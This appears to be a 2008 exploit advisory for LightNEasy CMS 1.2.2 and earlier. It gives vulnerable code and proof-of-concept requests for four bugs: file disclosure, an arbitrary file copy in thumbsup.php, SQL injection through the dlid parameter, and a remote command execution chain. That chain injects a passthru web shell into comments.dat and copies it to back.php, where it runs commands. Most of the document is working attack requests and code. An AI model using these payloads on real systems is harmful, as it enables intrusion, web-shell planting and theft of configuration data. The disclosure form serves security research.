LightNEasy SQLite / no database versions 1.2.2 and below suffer from code execution, SQL injection, file disclosure, and other vulnerabilities.
# Author: __GiReX__
# mySite:
# Date: 14/04/08
# CMS: LightNEasy SQLite / no database <= 1.2.2
# Site:
# Advisory: Multiple Remote Vulnerabilities
# Need: magic_quotes_gpc = Off
magic_quotes_gpc = On / Off for SQL Injections
# Bug 1: Remote File Disclosure
# Affected: SQLite / no database
# Get the config.php into HTML (like a comment)
# Note config.php not exists in SQLite version
# PoC: [host]/[path]/LightNEasy.php?page=config.php%00
# Bug 2: Arbitrary file copy and rename / Thumsup v1.12
# Affected: SQLite / no database
# This vuln is present in this extern script by Gerd Tentler that is included by default
# in LightNEasy
# Vuln Code: LightNEasy/thumbsup.php
34. if(isset($_REQUEST['image'])) $image = $_REQUEST['image'];
37. if(isset($_REQUEST['cache_dir'])) $cache_dir = $_REQUEST['cache_dir'];
407. if($image) {
if($fp = @fopen($image, 'rb')) { <==
$size = filesize($image); <== Unfortunally filesize does not accept remote files
$data = fread($fp, $size); <==
$original = "$cache_dir/img_" . md5($image . $size); <==
else $error = 'Could not open';
414. }
451. if(!file_exists($original)) {
if($fp = @fopen($original, 'wb')) { <==
fwrite($fp, $data, strlen($data)); <==
455. }
# Note config.php not exists in SQLite version
# PoC: [host]/[path]/LightNEasy/thumbsup.php?image=../data/config.php&cache_dir=config.txt%00
# And then get file disclosure with:
# PoC: [host]/[path]/LightNEasy/config.txt
# Bug 3: Getting a Remote Command Execution
# Affected: SQLite / no database
# First of all inject PHP Code into comments.dat from $_POST['newsid'] that is not sanizated
# Vuln code: LightNEasy/runtime.php
32. if($_POST['submit']=="sendcomment") {
42. if(!$fp=fopen("data/comments.dat","a")) die ($langmessage[142]);
43. fwrite($fp,$_POST['newsid']."|".encode($_POST['commentname'])."|". <==
44. encode($_POST['commentemail'])."|".time()."|".encode(stripslashes($_POST['commentmessage']))."||");
# PoC: If admin has been created some news and page news exists (it can has a different name)
POST [host]/[path]/LightNEasy.php?page=news
Content-Type: application/x-www-form-urlencoded
commentname=1&commentemail=1&commentmessage=1&secCode=[CAPTCHA CODE]
&submit=sendcomment&newsid=<?php passthru($_GET['cmd']); ?>/*
# Then create a file back.php with the trick of Bug 2
# PoC: [host]/[path]/LightNEasy/thumbsup.php?image=../data/comments.dat&cache_dir=../back.php%00
# Finally send remote commands to back.php
# PoC: [host]/[path]/back.php?cmd=ls
# Bug 4: Multiple Remote SQL Injections
# Affected: SQLite
# Works with magic_quotes_gpc = On / Off
# Vuln Code: /LightNEasy/lightneasy.php
237. if(isset($_GET['dlid'])) {
$result=dbquery("SELECT * FROM downloads WHERE reg=".$_GET['dlid']);
# PoC: [host]/[path]/index.php?dlid=-1 OR 1
# You can find others more SQL Injections by yourself